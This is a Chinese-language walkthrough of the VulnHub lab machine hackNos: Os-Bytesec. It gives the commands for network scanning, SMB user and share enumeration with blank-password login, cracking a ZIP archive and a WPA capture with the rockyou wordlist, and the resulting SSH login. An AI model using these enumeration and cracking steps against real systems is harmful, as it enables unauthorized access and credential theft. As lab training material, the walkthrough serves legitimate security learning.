一、靶机下载地址
hackNos: Os-Bytesec ~ VulnHub
二、信息收集
1、主机发现
#使用命令
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:D9:03:37'
![](https://img-blog.csdnimg.cn/img_convert/67d69ba81a08a4dbaf7e055f4c74c1d7.png)
2、端口扫描
#使用命令
nmap 192.168.7.140 -p- -sV
![](https://img-blog.csdnimg.cn/img_convert/1b772113b315cb196f86a10d30e80489.png)
3、指纹识别
#使用命令
whatweb http://192.168.7.140
![](https://img-blog.csdnimg.cn/img_convert/6a53a81cc4ed8552145b70f8dba7497f.png)
4、目录扫描
#使用命令
dirsearch -u "http://192.168.7.140"
![](https://img-blog.csdnimg.cn/img_convert/c9b0e9a0ea077df9ac75201217a15a01.png)
三、获取webshell
1、访问靶机IP,发现底部信息,转战SMB攻击
![](https://img-blog.csdnimg.cn/img_convert/b29226bd4a81132cacfda6aafce1064c.png)
2、使用enum4linux工具与acccheck工具对目标主机查询用户信息与枚举用户密码,发现账户为smb
且密码为空
#枚举目标用户
enum4linux -U 192.168.7.140
#acccheck工具下载地址
git clone https://github.com/qashqao/acccheck.git
#acccheck工具的使用
cd acccheck
./acccheck.pl -t 192.168.7.140 -u smb -v
#注
acccheck.pl文件是没有权限的,得赋予权限才能使用
#使用命令
chmod 777 acccheck.pl
![](https://img-blog.csdnimg.cn/img_convert/8ab40272462e170dad1a645cb4ec90b2.png)
![](https://img-blog.csdnimg.cn/img_convert/918f0ff8086d9442d3b8d606b23d0359.png)
3、使用smbmap
枚举靶机的共享资源并使用smbclient
进行登录
#枚举靶机的共享资源
smbmap -u 'smb' -p '' -H 192.168.7.140
#查看靶机的共享目录
smbclient -L 192.168.7.140 -U smb
#登录目标靶机
smbclient //192.168.7.140/print$ -U smb
![](https://img-blog.csdnimg.cn/img_convert/d54e7e25c057b9a239f5517e64bb5a0d.png)
![](https://img-blog.csdnimg.cn/img_convert/1cdc1ce142e72edd7a541c45eb9fb70f.png)
4、尝试进入smb用户的目录下,发现有两个文件并使用get
命令下载
#进入到smb用户目录下
smbclient //192.168.7.140/smb -U smb
#下载两个文件
get main.txt
get safe.zip
![](https://img-blog.csdnimg.cn/img_convert/daf0f6359c0ca7e3845e3a79a85e4d49.png)
![](https://img-blog.csdnimg.cn/img_convert/26c291b5b9b6bcb7b3112bda96ea3735.png)
5、查看下载下来的文件main.txt
中只有个字符串helo
,而解压safe.zip
需要密码,这里使用fcrackzip
进行破解,得到压缩包密码:hacker1
#下载fcrackzip工具
apt-get install fcrackzip
#解压rockyou.txt.gz文件
cd /usr/share/wordlists/
gzip -d rockyou.txt.gz
#使用fcrackzip工具进行爆破
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
![](https://img-blog.csdnimg.cn/img_convert/0e1d1ab8cd4b3622ac9e118c2c47c5dc.png)
![](https://img-blog.csdnimg.cn/img_convert/ff71e83d17f9f7de10993e7b0118a395.png)
6、解压safe.zip
文件,得到secret.jpg
和user.cap
两个文件
#解压safe.zip文件
unzip safe.zip
![](https://img-blog.csdnimg.cn/img_convert/de8993ebceb2bbae748891cca377b025.png)
7、解压缩包后发现两个文件secret.jpg
图片文件和user.cap
网络包文件并使用Wireshark
查看为无线网络数据包,发现无线网络的SSID为blackjax.
,这里使用aircrack-ng
破解无线密码
#使用命令
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
![](https://img-blog.csdnimg.cn/img_convert/8c897f0d36008ac2579b0e654faa1342.png)
![](https://img-blog.csdnimg.cn/img_convert/0d194a956ada92b9aff76a1578c39506.png)
8、上一步破解出无线名称密码为blackjax:snowflake
尝试SSH登录目标主机,成功登录,获取flag
#使用命令
ssh blackjax@192.168.7.140 -p 2525
![](https://img-blog.csdnimg.cn/img_convert/78f4d190940c6205fad5d64c8f9abcb9.png)